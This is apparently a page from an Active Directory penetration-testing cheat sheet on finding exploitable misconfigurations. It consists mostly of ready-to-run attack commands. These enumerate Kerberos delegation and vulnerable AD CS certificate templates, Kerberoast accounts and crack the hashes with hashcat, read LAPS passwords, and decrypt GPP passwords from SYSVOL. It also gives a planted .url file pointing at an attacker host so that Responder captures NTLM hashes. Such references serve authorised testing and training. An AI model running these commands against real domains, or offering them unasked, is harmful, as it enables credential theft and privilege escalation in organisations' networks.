04 / Vulnerability Discovery

Vulnerability Discovery

Find exploitable misconfigurations in AD: Kerberos delegation, certificate authority vulnerabilities (ESC1–ESC8), ACL abuses, LAPS exposure and hash capture opportunities.

AD CS Vulnerabilities (ESC1–ESC8)

Understanding Active Directory Certificate Services misconfigurations and how each ESC vulnerability can be abused to escalate privileges or move laterally.

certipyAD CSCertificates

soon

Kerberos Delegation Misconfigurations

Unconstrained, Constrained and RBCD delegation explained — how to find them with BloodHound and nxc, and why they're dangerous.

DelegationKerberosBloodHound

soon

ACL Abuse in Active Directory

GenericAll, GenericWrite, WriteOwner, WriteDACL and ForceChangePassword — how BloodHound reveals these paths and how to exploit them.

ACLBloodHounddacledit

soon

7.1 Kerberos Delegation

nxc / BloodHound

Find delegation configs via NXC

nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --find-delegation

BloodHound — search for delegation

# Search for: AllowedToDelegate, Unconstrained, ConstrainedDelegation

Delegation types

# Unconstrained Delegation — service can reuse any user TGT → most dangerous
# Constrained Delegation   — service can only delegate to specific services
# RBCD (Resource-Based Constrained) — target computer determines who can delegate

Find computers with unconstrained delegation (excluding DCs)

nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD -M get-uncd
Get-NetComputer -Unconstrained                      # PowerView
Get-DomainComputer -Unconstrained -Properties DnsHostName  # PowerView

BloodHound Cypher — unconstrained delegation

MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p

Find constrained delegation targets (Linux)

Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
Get-DomainUser -TrustedToAuth

BloodHound Cypher — constrained delegation

MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p

7.2 Certificates — AD CS (certipy)

certipy / certutil

ESC vulnerability reference

ESC	Description
ESC1	Template allows SAN + client auth + enrollment by low-priv user
ESC2	Template with Any Purpose EKU or no EKU
ESC3	Certificate Request Agent template abuse
ESC4	Write access on template (can be modified to ESC1)
ESC6	CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag
ESC7	CA manager rights
ESC8	NTLM relay to AD CS web enrollment

Enumerate — find vulnerable templates

certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $TARGET_IP -vulnerable -stdout
certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $TARGET_IP -vulnerable -text

Filter output for ESC vulnerabilities

grep -iE "vulnerable|esc" certipy_output.txt

CERTUTIL (on Windows machine) — find vulnerable templates

certutil -Template -v > templates.txt
# convert UTF-16 → UTF-8:
iconv -f UTF-16LE -t UTF-8 templates.txt -o templates_utf8.txt
grep -E "Allow Enroll|Client Authentication|CT_FLAG_ENROLLEE" templates_utf8.txt

Vulnerable template criteria (all 3 must be true)

# 1. Parameter: you have enroll rights (check 'Allow Enroll' for your groups)
#    find your groups: net user  /domain
# 2. Client Authentication: EKU contains 'Client Authentication'
# 3. Client specifies SAN: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 1

7.3 ACL Misconfigurations

BloodHound / acltoolkit

BloodHound — ACL paths to discover

# Interesting rights: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword

Read ACL entries on an object (Linux)

acltoolkit $DOMAIN/$USERNAME:'<password>'@<target> get-objectacl [-all] -object <object>

Targeted Kerberoasting — set SPN on user and request TGS

targetedKerberoast.py -d $DOMAIN -u $USERNAME -p $PASSWORD
hashcat -m 13100 tgs_targeted.txt /usr/share/wordlists/rockyou.txt

7.4 LAPS (Local Administrator Password Solution)

nxc / PowerShell

Read LAPS passwords if you have read rights on ms-MCS-AdmPwd

nxc ldap $DC_IP -d $DOMAIN -u $USERNAME -p $PASSWORD --module laps
nxc ldap $DC_IP -u $USERNAME -p $PASSWORD -M laps

Via PowerShell

Get-LAPSPasswords -DomainController $DC_IP -Credential $DOMAIN\$USERNAME | Format-Table -AutoSize

BloodHound — who can read LAPS?

MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p

Via Metasploit (on Meterpreter session)

use post/windows/gather/credentials/enum_laps
run

6.2 Capturing Hashes — URL/SCF Attack

Responder

Create @link.url file (@ puts it at top of share directory)

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\$ATTACKER_IP\%USERNAME%.icon
IconIndex=1

Upload to writable share and start Responder

smbclient //$TARGET_IP/share
put @link.url
# exit smb, then:
responder -I eth0 -v

GPP passwords in SYSVOL (max Windows Server 2012)

# Via Metasploit:
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS $TARGET_IP
set SMBUser $USERNAME
set SMBPass $PASSWORD
run

# Via smbclient — groups.xml is usually in SYSVOL:
smbclient //$TARGET_IP/SYSVOL -N
prompt off
recurse on
mget *
grep -r "cpassword" .
gpp-decrypt 'CPASSWORD_VALUE'

# Via NXC:
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD -M gpp_password
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD -M gpp_autologin

← Password Attacks Next: Exploitation →